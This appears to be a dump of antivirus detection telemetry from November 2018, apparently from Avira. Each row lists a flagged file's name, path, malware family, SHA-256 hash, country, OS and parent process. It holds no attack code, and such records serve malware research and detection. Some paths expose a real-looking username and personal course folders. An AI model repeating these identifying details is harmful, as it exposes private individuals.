  Row(detection=Row(filename='avscan-20181101-105752-977afce3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105752-977AFCE3', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124216-9cb42619', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124154-89D16AE6\\AVSCAN-20181101-124216-9CB42619', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='khắc phục hồ sơ báo  cáo.exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\khắc phục hồ sơ báo  cáo.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c91a9dda6a378280cef785f24fcaf7544e57085e517ca6e8bdf812c255e54c7f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123606-60f2e0de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123546-4FF3A8CF\\AVSCAN-20181101-123606-60F2E0DE', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:36:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110157-b66b366b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110157-B66B366B', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nskBD05.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:24:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsd1822.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D8DCDE5E9CEFF8AD5B7494FBB855D3F1673BA1622B23DC62AD3EB555029C5709', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d8dcde5e9ceff8ad5b7494fbb855d3f1673ba1622b23dc62ad3eb555029c5709', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:11:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clickjogos - ultimate spider-man - teia de ferro.exe', filepath='C:\\Users\\X\\Downloads\\ClickJogos - Ultimate Spider-Man - Teia de Ferro.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='916a157ec6c89876731b18b26138e9b8229a9a97811a8d572c5b4805aaee88c6', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:32:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cfprocsrvc.exe', filepath='C:\\Program Files (x86)\\TOSHIBA\\ConfigFree\\CFProcSRVC.exe', filesize=112000, name='W32/Sality.AT.#M1.#R1'), hash='7124621f60008b12b51899275b5e8bde293d8d2375748ac08c57164823e1153c', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:44:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='d9186a5819ffad47f82a6e1720812a0589ad39f9fda4f4c32e690f1205f8e2e3', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:35:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-174304-02633442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-174304-02633442', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17610_none_755d8d6179bb210c\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='403c1be317f33ec1926ed717b60ee11e8e46e2b3f7fc2e2a3944a0c473fc4e53', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsusbredirectiongrouppolicycontrol.exe', filepath='F:\\Windows\\winsxs\\x86_microsoft-windows-r..s-regkeys-component_31bf3856ad364e35_6.1.7601.17514_none_21d2afd5583776b6\\TsUsbRedirectionGroupPolicyControl.exe', filesize=320000, name='W32/Sality.AG.#M1.#R1'), hash='59002443c353b53dd8d4fe0d477da5ffc1047de78b2c9d089193ed8735ee13f6', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:54:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001521-784395b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_90cb24d3\\AVSCAN-20181102-001454-7532F1A5\\AVSCAN-20181102-001521-784395B8', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:15:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:25:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='system volume information.exe', filepath='D:\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='388a734e1ec41559c2578c82242cd984b2559f81e04811552762fa1d5a4a18ed', metadata=Row(cmdline=None, country='BF', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181449-44f4e56b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0b5b7bb8\\AVSCAN-20181101-181432-41CFC8A3\\AVSCAN-20181101-181449-44F4E56B', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:36:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124150-29064125', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7dc7e76b\\AVSCAN-20181101-124121-265EC4D9\\AVSCAN-20181101-124150-29064125', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:41:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T23:38:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gbomberic2.exe', filepath='\\?\\J:\\العاب\\Bomberic 2\\gBomberic2.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='47c1940e82f84be8618483d0c3a4219f2aabad828d951e71c3ed16f43296017e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='10fb9d7bc76a1da9aba86159dd31e17feffcd510948c9b6d060b4b95cbf806b8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='324d455da0685a77d5b2bb5c8588e0354fb38b89e35efb2248987a68a554112d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\324D455DA0685A77D5B2BB5C8588E0354FB38B89E35EFB2248987A68A554112D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='324d455da0685a77d5b2bb5c8588e0354fb38b89e35efb2248987a68a554112d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:13:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0007e536', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp0007e536', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:44:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002018-f24cf4d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-002018-F24CF4D4', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T05:58:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T22:38:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222044-ae62f85f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0544a140\\AVSCAN-20181101-222027-AAB92F0A\\AVSCAN-20181101-222044-AE62F85F', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa16044.28412\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa16044.28412\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:11:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsoFCD.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1_163.15_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-01T17:02:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kit aziendali.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\KIT AZIENDALI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:17:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='test finali.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\CORSO CARVICO\\TEST FINALI.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104736-4f18d0fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cce6a299\\AVSCAN-20181101-104725-4CF1D47E\\AVSCAN-20181101-104736-4F18D0FE', filesize=72000, name='PUA/Downloader.Gen.#M1.#R1'), hash='cbe8c17d74ba87caeffb5e6f1af1a1c8cbc8dbc0bea47e5335cb05e46963e384', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:47:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A674F9F961326D1B73E7B83DA09747F4311E064DD20E3F7D21952305944C54FD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a674f9f961326d1b73e7b83da09747f4311e064dd20e3f7d21952305944c54fd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir002', filepath='\\\\?\\C:\\Applications\\Service.VIR002', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iddbas32.dll', filepath='C:\\Program Files\\Common Files\\Borland Shared\\BDE\\IDDBAS32.DLL', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f45291519629901e49456c172f56d6dc83ee69050860f8825362aa2d32e70b46', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:29:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00008097', filepath='C:\\Windows\\Temp\\3fe54954-9681-461b-a9b9-3c579da05640\\tmp000002bd\\tmp00008097', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='a6ca0943233cad63a0fff78661b9b8dbf309fe8614a42b28f2b5c13b09f96d0f', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:27:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ezhambmzzi3\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ljrqf0pv4ru\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:13:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f181f26cf4ba723d7aa6551e28a8e244296621cf0474f54835c0c78bbff96cc3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\F181F26CF4BA723D7AA6551E28A8E244296621CF0474F54835C0C78BBFF96CC3', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f181f26cf4ba723d7aa6551e28a8e244296621cf0474f54835c0c78bbff96cc3', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:50:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f0f2a43eb5b31bb921026fd77c0ab32d2070c68c2e457013ee90ea3ffe140619', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\F0F2A43EB5B31BB921026FD77C0AB32D2070C68C2E457013EE90EA3FFE140619', filesize=1088000, name='ADWARE/Wajam.Gen4.#M300.#R301210'), hash='f0f2a43eb5b31bb921026fd77c0ab32d2070c68c2e457013ee90ea3ffe140619', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:23:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\cred553rqcx\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ZM', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=14544792, timestamp='2018-11-01T15:07:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ethdcrminer64.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R31G5FB.3\\cuda7.5\\EthDcrMiner64.exe', filesize=5696000, name='HEUR/AGEN.1033248.#M1.#R1'), hash='caac48aa46538bc5815b44512a284c41de7a293e9bcc27ff64aef7e3c7622ec7', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f13ee27b9455ab2f71cff6299132cd833f0024e14d5a023a9f3ec4d815deb64a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F13EE27B9455AB2F71CFF6299132CD833F0024E14D5A023A9F3EC4D815DEB64A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f13ee27b9455ab2f71cff6299132cd833f0024e14d5a023a9f3ec4d815deb64a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uqmjdymh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\uqmJdyMH.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:04Z'), dt=datetime.date(2018, 11, 1)),
